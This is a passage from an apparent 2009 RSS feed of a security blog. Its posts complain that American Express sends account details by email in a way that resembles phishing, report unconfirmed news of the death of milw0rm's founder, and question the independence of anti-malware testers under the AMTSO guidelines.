<div><a href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1330&amp;title=HP+buys+3COM%3A+how+will+that+impact+ZDI%3F"rel="nofollow"  title="Digg"><img src="http://blogs.securiteam.com/wp-content/socializer-images/digg.png" title="Digg" alt="Digg" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://reddit.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1330&amp;title=HP+buys+3COM%3A+how+will+that+impact+ZDI%3F"rel="nofollow"  title="Reddit"><img src="http://blogs.securiteam.com/wp-content/socializer-images/reddit.png" title="Reddit" alt="Reddit" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://slashdot.org/bookmark.pl?title=HP+buys+3COM%3A+how+will+that+impact+ZDI%3F&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1330"rel="nofollow"  title="Slashdot"><img src="http://blogs.securiteam.com/wp-content/socializer-images/slashdot.png" title="Slashdot" alt="Slashdot" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://twitthis.com/twit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1330"rel="nofollow"  title="TwitThis"><img src="http://blogs.securiteam.com/wp-content/socializer-images/twitter.png" title="TwitThis" alt="TwitThis" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://sphinn.com/submit.php?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1330&amp;title=HP+buys+3COM%3A+how+will+that+impact+ZDI%3F"rel="nofollow"  title="Sphinn"><img src="http://blogs.securiteam.com/wp-content/socializer-images/sphinn.png" title="Sphinn" alt="Sphinn" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1330&amp;title=HP+buys+3COM%3A+how+will+that+impact+ZDI%3F"rel="nofollow"  title="StumbleUpon"><img src="http://blogs.securiteam.com/wp-content/socializer-images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://del.icio.us/post?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1330&amp;title=HP+buys+3COM%3A+how+will+that+impact+ZDI%3F"rel="nofollow"  title="del.icio.us"><img src="http://blogs.securiteam.com/wp-content/socializer-images/delicious.png" title="del.icio.us" alt="del.icio.us" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1330&amp;t=HP+buys+3COM%3A+how+will+that+impact+ZDI%3F"rel="nofollow"  title="Facebook"><img src="http://blogs.securiteam.com/wp-content/socializer-images/facebook.png" title="Facebook" alt="Facebook" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1330&amp;title=HP+buys+3COM%3A+how+will+that+impact+ZDI%3F"rel="nofollow"  title="Google"><img src="http://blogs.securiteam.com/wp-content/socializer-images/googlebookmark.png" title="Google" alt="Google" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://technorati.com/faves?add=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1330"rel="nofollow"  title="Technorati"><img src="http://blogs.securiteam.com/wp-content/socializer-images/technorati.png" title="Technorati" alt="Technorati" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="mailto:?subject=HP+buys+3COM%3A+how+will+that+impact+ZDI%3F&amp;body=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1330" title="E-mail this story to a friend!"><img src="http://blogs.securiteam.com/wp-content/socializer-images/email_link.png"rel="nofollow"  title="E-mail this story to a friend!" alt="E-mail this story to a friend!" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a></div>
<p>-</p>
<p>Is your site safe from SQL Injection attacks? Use an <a href="http://www.beyondsecurity.com/sql-injection.html">SQL Injection Scanner</a> on a daily basis to protect your network!</p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.securiteam.com/index.php/archives/1330/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Is it phish, or is it Amex?</title>
		<link>http://blogs.securiteam.com/index.php/archives/1328</link>
		<comments>http://blogs.securiteam.com/index.php/archives/1328#comments</comments>
		<pubDate>Wed, 04 Nov 2009 17:28:23 +0000</pubDate>
		<dc:creator>p1</dc:creator>
		
		<category>Commentary</category>

		<category>Privacy</category>

		<category>Spam</category>

		<category>Culture</category>

		<category>Phishing</category>

		<category>Corporate Security</category>

		<guid isPermaLink="false">http://blogs.securiteam.com/index.php/archives/1328</guid>
		<description><![CDATA[I am a bit freaked.
Last month I received an email message from American Express.  I very nearly deleted it unread: it was obviously phish, right?  (I was teaching in Toronto that week, so I had even more reason to turf it unread rather than look at it.)
However, since I do have an Amex card, I [...]]]></description>
			<content:encoded><![CDATA[<p>I am a bit freaked.</p>
<p>Last month I received an email message from American Express.  I very nearly deleted it unread: it was obviously phish, right?  (I was teaching in Toronto that week, so I had even more reason to turf it unread rather than look at it.)</p>
<p>However, since I do have an Amex card, I decided to at least have a look at it, and possibly try and find some way to send it to them.  So I looked at it.</p>
<p>And promptly freaked out.</p>
<p>The phishers had my card number.  (Or, at least, the last five digits of it.)  They knew the due date of my statement.  The knew the balance amount of my last statement.</p>
<p>(The fact that this was all happening while I am aware from home wasn&#8217;t making me feel any more comfortable with it &#8230;)</p>
<p>So I had a look at the headers.  And couldn&#8217;t find a single thing indicating that this wasn&#8217;t from American Express.</p>
<p>(I had paid my bill before I left.  Or, at least, I *thought* I had.  So I checked my bank.  Sure enough, that balance had been paid a couple of days before.  However, I guess banks never actually transfer money on the weekend or something &#8230;)</p>
<p>A couple of days later I got another message: Amex was telling me that my payment was received.  That&#8217;s nice of them.  They were once again sending, in an unencrypted email message, the last five digits of my card number, and the last balance paid on my account.</p>
<p>Well, I figured that it might have been an experiment, and that they&#8217;d probably realize the error of their ways, and I didn&#8217;t necessarily need to point this out.  Apparently I was wrong on all counts, since I got another reminder message today.</p>
<p>Are these people completely unaware of the existence and risk of phishing?  Are they so totally ignorant of online security that they are encouraging their customers to be looking for legitimate email from a financial institution, thus increasing the risk of deception and fraud?</p>
<p>Going to their Website, I notice that there is now an &#8220;Account Alerts&#8221; function.  It may have been there for a while: I don&#8217;t know, since I&#8217;ve never used it.  Since I&#8217;ve never used it, I assume it was populated by default when they created it.  It seems to, by default, send you a payment due notice a week before the deadline, a payment received notice when payment is received, and a notice when you approach your credit limit.  (Fortunately, someone had the good sense not to automatically populate the option that sends you your statement balance every week.)  These options may be useful to some people.  But they should be options: they shouldn&#8217;t be sending a bunch of information about everybody&#8217;s account, in the clear, by default.</p>
<p>(There are, of course, &#8220;Terms and Conditions&#8221; applicable to this service, which basically say, as usual, that Amex isn&#8217;t responsible for much of anything, have warned you, and that you take all the risks arising from this function.  I find this heavily ironic, since I knew nothing of the service, don&#8217;t want it, and got it automatically.  I never even knew the &#8220;Terms and Conditions&#8221; existed, but in order to turn the service <strong>off</strong> I&#8217;ll have to read them.)</p>
<p>(In trying to send a copy of this to Amex, I note that their Website only lists phone and snailmail as contact options, you aren&#8217;t supposed to be able to send them email.)
<div><a href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1328&amp;title=Is+it+phish%2C+or+is+it+Amex%3F"rel="nofollow"  title="Digg"><img src="http://blogs.securiteam.com/wp-content/socializer-images/digg.png" title="Digg" alt="Digg" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://reddit.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1328&amp;title=Is+it+phish%2C+or+is+it+Amex%3F"rel="nofollow"  title="Reddit"><img src="http://blogs.securiteam.com/wp-content/socializer-images/reddit.png" title="Reddit" alt="Reddit" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://slashdot.org/bookmark.pl?title=Is+it+phish%2C+or+is+it+Amex%3F&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1328"rel="nofollow"  title="Slashdot"><img src="http://blogs.securiteam.com/wp-content/socializer-images/slashdot.png" title="Slashdot" alt="Slashdot" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://twitthis.com/twit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1328"rel="nofollow"  title="TwitThis"><img src="http://blogs.securiteam.com/wp-content/socializer-images/twitter.png" title="TwitThis" alt="TwitThis" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://sphinn.com/submit.php?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1328&amp;title=Is+it+phish%2C+or+is+it+Amex%3F"rel="nofollow"  title="Sphinn"><img src="http://blogs.securiteam.com/wp-content/socializer-images/sphinn.png" title="Sphinn" alt="Sphinn" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1328&amp;title=Is+it+phish%2C+or+is+it+Amex%3F"rel="nofollow"  title="StumbleUpon"><img src="http://blogs.securiteam.com/wp-content/socializer-images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://del.icio.us/post?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1328&amp;title=Is+it+phish%2C+or+is+it+Amex%3F"rel="nofollow"  title="del.icio.us"><img src="http://blogs.securiteam.com/wp-content/socializer-images/delicious.png" title="del.icio.us" alt="del.icio.us" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1328&amp;t=Is+it+phish%2C+or+is+it+Amex%3F"rel="nofollow"  title="Facebook"><img src="http://blogs.securiteam.com/wp-content/socializer-images/facebook.png" title="Facebook" alt="Facebook" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1328&amp;title=Is+it+phish%2C+or+is+it+Amex%3F"rel="nofollow"  title="Google"><img src="http://blogs.securiteam.com/wp-content/socializer-images/googlebookmark.png" title="Google" alt="Google" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://technorati.com/faves?add=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1328"rel="nofollow"  title="Technorati"><img src="http://blogs.securiteam.com/wp-content/socializer-images/technorati.png" title="Technorati" alt="Technorati" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="mailto:?subject=Is+it+phish%2C+or+is+it+Amex%3F&amp;body=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1328" title="E-mail this story to a friend!"><img src="http://blogs.securiteam.com/wp-content/socializer-images/email_link.png"rel="nofollow"  title="E-mail this story to a friend!" alt="E-mail this story to a friend!" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a></div>
<p>-</p>
<p>Make your website safer. Use an external <a href="http://www.beyondsecurity.com/vulnerability-scanner.html">vulnerability scanner</a>. Nothing to install, zero maintenance!</p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.securiteam.com/index.php/archives/1328/feed/</wfw:commentRss>
		</item>
		<item>
		<title>st0rke</title>
		<link>http://blogs.securiteam.com/index.php/archives/1327</link>
		<comments>http://blogs.securiteam.com/index.php/archives/1327#comments</comments>
		<pubDate>Wed, 04 Nov 2009 09:43:50 +0000</pubDate>
		<dc:creator>noam</dc:creator>
		
		<category>Commentary</category>

		<guid isPermaLink="false">http://blogs.securiteam.com/index.php/archives/1327</guid>
		<description><![CDATA[I just read the sad news that st0rke, also known as the maintainer and founder of milw0rm has passed away, the problem with this news item is that it very difficult to judge whether or not it is true, as the source is not &#8220;the official news media&#8221; you would normally trust.
This of course will [...]]]></description>
			<content:encoded><![CDATA[<p>I just read the sad news that <a rel="nofollow" href="http://bl4cksecurity.blogspot.com/2009/11/str0ke-milworms-funeral-is-this-friday.html">st0rke</a>, also known as the maintainer and founder of milw0rm has passed away, the problem with this news item is that it very difficult to judge whether or not it is true, as the source is not &#8220;the official news media&#8221; you would normally trust.</p>
<p>This of course will not hit CNN, FOX, or any other news agency, and will be posted on, usually, underground mailing list or blog which might or not have a hidden agenda in respect to giving out such news items.</p>
<p>This if of course not the first time someone was claimed to have died, with only rumours circulating and then finally after some time, it was determined to be true, as their site was no longer being updated, and emails sent to him never got a reply.</p>
<p>If it is in fact true, the story about str0ke, I am sadden to hear it, and I send my condolences to his family, wife and 4 kids.
<div><a href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1327&amp;title=st0rke"rel="nofollow"  title="Digg"><img src="http://blogs.securiteam.com/wp-content/socializer-images/digg.png" title="Digg" alt="Digg" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://reddit.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1327&amp;title=st0rke"rel="nofollow"  title="Reddit"><img src="http://blogs.securiteam.com/wp-content/socializer-images/reddit.png" title="Reddit" alt="Reddit" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://slashdot.org/bookmark.pl?title=st0rke&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1327"rel="nofollow"  title="Slashdot"><img src="http://blogs.securiteam.com/wp-content/socializer-images/slashdot.png" title="Slashdot" alt="Slashdot" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://twitthis.com/twit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1327"rel="nofollow"  title="TwitThis"><img src="http://blogs.securiteam.com/wp-content/socializer-images/twitter.png" title="TwitThis" alt="TwitThis" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://sphinn.com/submit.php?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1327&amp;title=st0rke"rel="nofollow"  title="Sphinn"><img src="http://blogs.securiteam.com/wp-content/socializer-images/sphinn.png" title="Sphinn" alt="Sphinn" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1327&amp;title=st0rke"rel="nofollow"  title="StumbleUpon"><img src="http://blogs.securiteam.com/wp-content/socializer-images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://del.icio.us/post?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1327&amp;title=st0rke"rel="nofollow"  title="del.icio.us"><img src="http://blogs.securiteam.com/wp-content/socializer-images/delicious.png" title="del.icio.us" alt="del.icio.us" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1327&amp;t=st0rke"rel="nofollow"  title="Facebook"><img src="http://blogs.securiteam.com/wp-content/socializer-images/facebook.png" title="Facebook" alt="Facebook" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1327&amp;title=st0rke"rel="nofollow"  title="Google"><img src="http://blogs.securiteam.com/wp-content/socializer-images/googlebookmark.png" title="Google" alt="Google" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://technorati.com/faves?add=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1327"rel="nofollow"  title="Technorati"><img src="http://blogs.securiteam.com/wp-content/socializer-images/technorati.png" title="Technorati" alt="Technorati" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="mailto:?subject=st0rke&amp;body=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1327" title="E-mail this story to a friend!"><img src="http://blogs.securiteam.com/wp-content/socializer-images/email_link.png"rel="nofollow"  title="E-mail this story to a friend!" alt="E-mail this story to a friend!" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a></div>
<p>-</p>
<p>Let the experts make sure your website is safe. <a href="http://www.beyondsecurity.com/vulnerability-assessment.html">Vulnerability Assessment</a> is the answer.</p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.securiteam.com/index.php/archives/1327/feed/</wfw:commentRss>
		</item>
		<item>
		<title>A Fairy Tale</title>
		<link>http://blogs.securiteam.com/index.php/archives/1326</link>
		<comments>http://blogs.securiteam.com/index.php/archives/1326#comments</comments>
		<pubDate>Mon, 05 Oct 2009 19:07:25 +0000</pubDate>
		<dc:creator>David Harley</dc:creator>
		
		<category>Commentary</category>

		<category>Virus</category>

		<category>malware</category>

		<guid isPermaLink="false">http://blogs.securiteam.com/index.php/archives/1326</guid>
		<description><![CDATA[Withdrawn on legal advice. Sigh&#8230;
So I&#8217;m going to ask some hypothetical questions instead.
Principle 3 of the AMTSO (Anti-Malware Testing Standards Organization) guidelines document (http://www.amtso.org/amtso&#8212;download&#8212;amtso-fundamental-principles-of-testing.html) states that &#8220;Testing should be reasonably open and transparent.&#8221; 
The document goes on to explain what information on the test and the test methodology it&#8217;s reasonable to ask for.
So is it [...]]]></description>
			<content:encoded><![CDATA[<p>Withdrawn on legal advice. Sigh&#8230;</p>
<p>So I&#8217;m going to ask some hypothetical questions instead.</p>
<p>Principle 3 of the AMTSO (<a href="http://www.amtso.org">Anti-Malware Testing Standards Organization</a>) guidelines document (<a href="http://www.amtso.org/amtso---download---amtso-fundamental-principles-of-testing.html">http://www.amtso.org/amtso&#8212;download&#8212;amtso-fundamental-principles-of-testing.html</a>) states that &#8220;Testing should be reasonably open and transparent.&#8221; </p>
<p>The document goes on to explain what information on the test and the test methodology it&#8217;s reasonable to ask for.</p>
<p>So is it open and transparent for an anti-malware tester who claims that his tests are compliant with AMTSO guidelines to decline to answer a vendor&#8217;s questions or give any information about the reported performance of their product unless they buy a copy of the report or pay a consultancy fee to the tester?</p>
<p>There is, of course, nothing to stop an anti-malware tester soliciting payment from the vendors whose products have been tested both in advance of the test and in response to requests for further information. But is he then entitled to claim to be independent and working without vendor funding? In what respect is this substantially different to the way in which certification testing organizations work, for example?</p>
<p>It seems to me that AMTSO is going to have to consider those questions at its next meeting (in Prague, next week). Purely hypothetically, of course. What do you think?</p>
<p>David Harley CISSP FBCS CITP<br />
Small Blue-Green World
<div><a href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1326&amp;title=A+Fairy+Tale"rel="nofollow"  title="Digg"><img src="http://blogs.securiteam.com/wp-content/socializer-images/digg.png" title="Digg" alt="Digg" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://reddit.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1326&amp;title=A+Fairy+Tale"rel="nofollow"  title="Reddit"><img src="http://blogs.securiteam.com/wp-content/socializer-images/reddit.png" title="Reddit" alt="Reddit" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://slashdot.org/bookmark.pl?title=A+Fairy+Tale&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1326"rel="nofollow"  title="Slashdot"><img src="http://blogs.securiteam.com/wp-content/socializer-images/slashdot.png" title="Slashdot" alt="Slashdot" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://twitthis.com/twit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1326"rel="nofollow"  title="TwitThis"><img src="http://blogs.securiteam.com/wp-content/socializer-images/twitter.png" title="TwitThis" alt="TwitThis" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://sphinn.com/submit.php?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1326&amp;title=A+Fairy+Tale"rel="nofollow"  title="Sphinn"><img src="http://blogs.securiteam.com/wp-content/socializer-images/sphinn.png" title="Sphinn" alt="Sphinn" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1326&amp;title=A+Fairy+Tale"rel="nofollow"  title="StumbleUpon"><img src="http://blogs.securiteam.com/wp-content/socializer-images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://del.icio.us/post?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1326&amp;title=A+Fairy+Tale"rel="nofollow"  title="del.icio.us"><img src="http://blogs.securiteam.com/wp-content/socializer-images/delicious.png" title="del.icio.us" alt="del.icio.us" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1326&amp;t=A+Fairy+Tale"rel="nofollow"  title="Facebook"><img src="http://blogs.securiteam.com/wp-content/socializer-images/facebook.png" title="Facebook" alt="Facebook" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1326&amp;title=A+Fairy+Tale"rel="nofollow"  title="Google"><img src="http://blogs.securiteam.com/wp-content/socializer-images/googlebookmark.png" title="Google" alt="Google" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://technorati.com/faves?add=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1326"rel="nofollow"  title="Technorati"><img src="http://blogs.securiteam.com/wp-content/socializer-images/technorati.png" title="Technorati" alt="Technorati" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="mailto:?subject=A+Fairy+Tale&amp;body=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1326" title="E-mail this story to a friend!"><img src="http://blogs.securiteam.com/wp-content/socializer-images/email_link.png"rel="nofollow"  title="E-mail this story to a friend!" alt="E-mail this story to a friend!" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a></div>
<p>-</p>
<p>Is your site safe from SQL Injection? <a href="http://www.beyondsecurity.com/vulnerability-scanner.html">Website Security Audit</a> is the way to protect your network!</p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.securiteam.com/index.php/archives/1326/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
